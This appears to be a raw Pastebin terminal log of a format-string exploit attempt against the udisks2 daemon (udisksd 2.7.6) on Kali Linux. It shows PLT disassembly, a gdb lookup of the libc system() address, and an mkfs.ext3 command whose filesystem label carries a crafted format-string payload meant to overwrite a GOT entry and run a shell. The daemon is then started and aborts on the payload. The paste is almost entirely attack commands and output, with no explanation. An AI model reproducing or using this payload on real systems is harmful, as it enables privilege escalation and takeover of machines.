Guest User

Untitled

a guest
Jan 16th, 2019
57
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.51 KB | None | 0 0
  1. 0000000000018370 <g_log_structured@plt>:
  2. 18370: ff 25 d2 29 25 00 jmpq *0x2529d2(%rip) # 26ad48 <g_log_structured>
  3. 47b36: e8 35 08 fd ff callq 18370 <g_log_structured@plt>
  4. root@kali:~# gdb /usr/lib/udisks2/udisksd
  5. GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git
  6. Copyright (C) 2016 Free Software Foundation, Inc.
  7. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
  8. This is free software: you are free to change and redistribute it.
  9. There is NO WARRANTY, to the extent permitted by law. Type "show copying"
  10. and "show warranty" for details.
  11. This GDB was configured as "x86_64-linux-gnu".
  12. Type "show configuration" for configuration details.
  13. For bug reporting instructions, please see:
  14. <http://www.gnu.org/software/gdb/bugs/>.
  15. Find the GDB manual and other documentation resources online at:
  16. <http://www.gnu.org/software/gdb/documentation/>.
  17. For help, type "help".
  18. Type "apropos word" to search for commands related to "word"...
  19. Reading symbols from /usr/lib/udisks2/udisksd...(no debugging symbols found)...done.
  20. (gdb) break main
  21. Breakpoint 1 at 0x19eb0
  22. (gdb) r
  23. Starting program: /usr/lib/udisks2/udisksd
  24. [Thread debugging using libthread_db enabled]
  25. Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
  26.  
  27. Breakpoint 1, 0x000055555556deb0 in main ()
  28. (gdb) p system
  29. $1 = {<text variable, no debug info>} 0x7ffff596f510 <__libc_system>
  30. (gdb) q
  31. A debugging session is active.
  32.  
  33. Inferior 1 [process 2281] will be killed.
  34.  
  35. Quit anyway? (y or n) y
  36. root@kali:~# mkfs.ext3 -L 'sh;#AAAA%24328x%7$hn%214719246x%8$hn' /dev/sdc1
  37. root@kali:~#
  38. root@kali:~# blkid
  39. /dev/sr0: UUID="2018-04-12-10-04-02-00" LABEL="Kali Live" TYPE="iso9660" PTUUID="a9ef3e16" PTTYPE="dos"
  40. /dev/sda1: UUID="ab38774d-df2f-4712-88f6-563fc9e71ac0" TYPE="ext4" PARTUUID="1f4e07df-01"
  41. /dev/sda5: UUID="789d84f1-2e1b-47c4-8b1c-aaa966153169" TYPE="swap" PARTUUID="1f4e07df-05"
  42. /dev/loop0: TYPE="squashfs"
  43. /dev/sdb1: LABEL="sh;#AAAA%24328x%7$hn%214719246x%8$hn" UUID="42FAB3436A7C2561" TYPE="ntfs" PTTYPE="dos" PARTUUID="7ddb2be9-01"
  44. root@kali:~# /usr/lib/udisks2/udisksd
  45. udisks-Message: 11:02:39.042: udisks daemon version 2.7.6 starting
  46.  
  47. ** (udisksd:2468): WARNING **: 11:02:39.061: failed to load module mdraid: libbd_mdraid.so.2: cannot open shared object file: No such file or directory
  48.  
  49. (udisksd:2468): udisks-WARNING **: 11:02:39.063: Failed to load the 'mdraid' libblockdev plugin
  50. udisks-Message: 11:02:39.220: Acquired the name org.freedesktop.UDisks2 on the system message bus
  51. *** invalid %N$ use detected ***
  52. Aborted
Add Comment
Please, Sign In to add comment